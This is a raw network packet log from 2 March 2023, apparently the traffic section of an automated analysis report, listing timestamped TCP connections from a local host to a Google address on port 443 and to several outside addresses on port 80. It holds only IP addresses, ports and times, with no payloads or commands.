Mar 2, 2023 17:19:42.240860939 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.240984917 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.240989923 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.241009951 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.241086960 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.241126060 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.241532087 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.241609097 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.241687059 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.241722107 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.241743088 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.241893053 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.242302895 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.242383957 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.242468119 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.242491961 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.242548943 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.242609024 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.243129969 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.243211031 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.243289948 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.243359089 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.243437052 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.243493080 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.243901968 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.244009018 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.244044065 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.244066000 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.244101048 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.244154930 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.244734049 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.244811058 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.244867086 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.244916916 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.244967937 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.245210886 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.245513916 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.245596886 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.245665073 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.245665073 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.245695114 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.245754957 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.246104956 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.246202946 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.246215105 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.246236086 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.246293068 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.246311903 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.246323109 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.246383905 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.246397018 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.246450901 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.246998072 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.247122049 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.247173071 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.247229099 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.247922897 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.247987032 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.248080969 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.248111010 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248111010 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248111010 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248111010 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248111010 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248111010 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248146057 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.248177052 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248213053 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248807907 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.248905897 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.248945951 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248964071 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.248965025 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.248982906 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249018908 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249038935 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249053955 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249093056 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249104023 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249141932 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249644041 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249696016 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249711990 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249753952 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249764919 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249808073 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249819994 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249840975 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.249865055 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.249885082 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.250531912 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.250598907 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.250618935 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.250669956 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.250672102 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.250705004 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.250727892 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.250766039 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.250777006 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.250817060 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251349926 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251405001 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251420975 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251463890 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251631975 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251697063 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251709938 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251753092 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251765013 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251782894 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251813889 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251840115 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251849890 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251893044 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.251902103 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.251938105 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.252614975 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.252686977 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.252706051 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.252749920 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.252760887 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.252801895 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.252811909 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.252868891 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.252870083 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.252892017 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.252918005 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.252954960 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.253487110 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.253555059 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.253585100 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.253709078 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.253724098 CET	443	49728	172.217.168.65	192.168.2.6
Mar 2, 2023 17:19:42.253767014 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.253971100 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:19:42.254004002 CET	49728	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:20:18.872301102 CET	49730	80	192.168.2.6	183.181.84.3
Mar 2, 2023 17:20:19.155041933 CET	80	49730	183.181.84.3	192.168.2.6
Mar 2, 2023 17:20:19.158639908 CET	49730	80	192.168.2.6	183.181.84.3
Mar 2, 2023 17:20:19.158641100 CET	49730	80	192.168.2.6	183.181.84.3
Mar 2, 2023 17:20:19.441582918 CET	80	49730	183.181.84.3	192.168.2.6
Mar 2, 2023 17:20:19.634284019 CET	80	49730	183.181.84.3	192.168.2.6
Mar 2, 2023 17:20:19.634330034 CET	80	49730	183.181.84.3	192.168.2.6
Mar 2, 2023 17:20:19.634468079 CET	49730	80	192.168.2.6	183.181.84.3
Mar 2, 2023 17:20:19.634804010 CET	49730	80	192.168.2.6	183.181.84.3
Mar 2, 2023 17:20:19.917604923 CET	80	49730	183.181.84.3	192.168.2.6
Mar 2, 2023 17:20:24.766910076 CET	49731	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:24.912132978 CET	80	49731	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:24.912358999 CET	49731	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:24.912605047 CET	49731	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:25.056452990 CET	80	49731	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:25.056494951 CET	80	49731	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:25.056516886 CET	80	49731	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:25.056647062 CET	49731	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:26.421700001 CET	49731	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:27.440522909 CET	49732	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:27.585486889 CET	80	49732	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:27.585743904 CET	49732	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:27.597650051 CET	49732	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:27.741892099 CET	80	49732	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:27.742013931 CET	80	49732	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:27.742044926 CET	80	49732	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:27.742192030 CET	49732	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:29.303941011 CET	49732	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:30.571115971 CET	49734	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:30.716223955 CET	80	49734	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:30.716480017 CET	49734	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:30.765657902 CET	49734	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:30.909784079 CET	80	49734	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:30.920242071 CET	80	49734	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:30.920275927 CET	80	49734	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:30.920514107 CET	49734	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:32.437166929 CET	49734	80	192.168.2.6	52.20.84.62
Mar 2, 2023 17:20:32.581326962 CET	80	49734	52.20.84.62	192.168.2.6
Mar 2, 2023 17:20:42.403597116 CET	49735	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:42.571743011 CET	80	49735	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:42.572105885 CET	49735	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:42.613642931 CET	49735	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:42.780636072 CET	80	49735	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:42.781308889 CET	80	49735	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:42.781425953 CET	80	49735	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:42.784411907 CET	49735	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:44.124063015 CET	49735	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:45.127096891 CET	49736	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:45.288749933 CET	80	49736	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:45.288876057 CET	49736	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:45.289100885 CET	49736	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:45.450315952 CET	80	49736	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:45.450390100 CET	80	49736	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:45.450495958 CET	80	49736	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:45.463640928 CET	49736	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:46.837243080 CET	49736	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:48.288278103 CET	49737	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:48.446428061 CET	80	49737	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:48.447016001 CET	49737	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:48.463335037 CET	49737	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:48.623002052 CET	80	49737	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:48.623842955 CET	80	49737	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:48.623881102 CET	80	49737	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:48.623984098 CET	49737	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:48.624175072 CET	49737	80	192.168.2.6	172.96.191.163
Mar 2, 2023 17:20:48.783538103 CET	80	49737	172.96.191.163	192.168.2.6
Mar 2, 2023 17:20:53.670600891 CET	49738	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:53.845370054 CET	80	49738	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:53.845483065 CET	49738	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:53.845599890 CET	49738	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:54.019541979 CET	80	49738	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:54.133668900 CET	80	49738	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:54.133733034 CET	80	49738	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:54.133806944 CET	49738	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:55.352322102 CET	49738	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:56.370611906 CET	49740	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:56.544722080 CET	80	49740	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:56.544850111 CET	49740	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:56.545073986 CET	49740	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:56.719108105 CET	80	49740	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:56.848773003 CET	80	49740	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:56.848803997 CET	80	49740	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:56.849047899 CET	49740	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:58.055923939 CET	49740	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:59.074645996 CET	49741	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:59.246737003 CET	80	49741	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:59.247003078 CET	49741	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:59.247154951 CET	49741	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:59.419008017 CET	80	49741	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:59.527371883 CET	80	49741	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:59.527407885 CET	80	49741	162.0.236.127	192.168.2.6
Mar 2, 2023 17:20:59.527580023 CET	49741	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:59.527748108 CET	49741	80	192.168.2.6	162.0.236.127
Mar 2, 2023 17:20:59.699733973 CET	80	49741	162.0.236.127	192.168.2.6
Mar 2, 2023 17:21:04.675415993 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:04.846322060 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:04.846570969 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:04.846663952 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:05.018912077 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945653915 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945691109 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945709944 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945723057 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945779085 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945847988 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945885897 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945924997 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945943117 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.945964098 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:05.946044922 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:05.946178913 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.117234945 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117358923 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117407084 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117454052 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117482901 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.117502928 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117535114 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.117552042 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117599010 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117600918 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.117646933 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117695093 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.117700100 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117747068 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117791891 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.117791891 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117841005 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.117886066 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.288798094 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288836956 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288857937 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288880110 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288918972 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288933992 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.288940907 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288960934 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.288976908 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.288984060 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.289005041 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.289011002 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.289035082 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.289236069 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.289258957 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.289275885 CET	80	49742	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:06.289325953 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.289357901 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:06.353816986 CET	49742	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.377823114 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.548806906 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.549001932 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.554261923 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.724761009 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.724827051 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790421963 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790477037 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790504932 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790535927 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790564060 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790617943 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.790638924 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790667057 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.790668964 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790699959 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.790712118 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790736914 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790764093 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.790775061 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.790827036 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.961452007 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961528063 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961574078 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961620092 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961647034 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.961667061 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961714983 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961721897 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.961764097 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961772919 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.961811066 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961857080 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961863041 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.961905956 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961951971 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.961962938 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.961998940 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.962043047 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.962053061 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:07.962089062 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:07.962141037 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:08.132698059 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132745028 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132766008 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132783890 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132805109 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132848024 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132869959 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132925034 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:08.132935047 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132957935 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.132980108 CET	80	49743	208.109.43.28	192.168.2.6
Mar 2, 2023 17:21:08.133029938 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:08.133029938 CET	49743	80	192.168.2.6	208.109.43.28
Mar 2, 2023 17:21:08.133059025 CET	49743	80	192.168.2.6	208.109.43.28
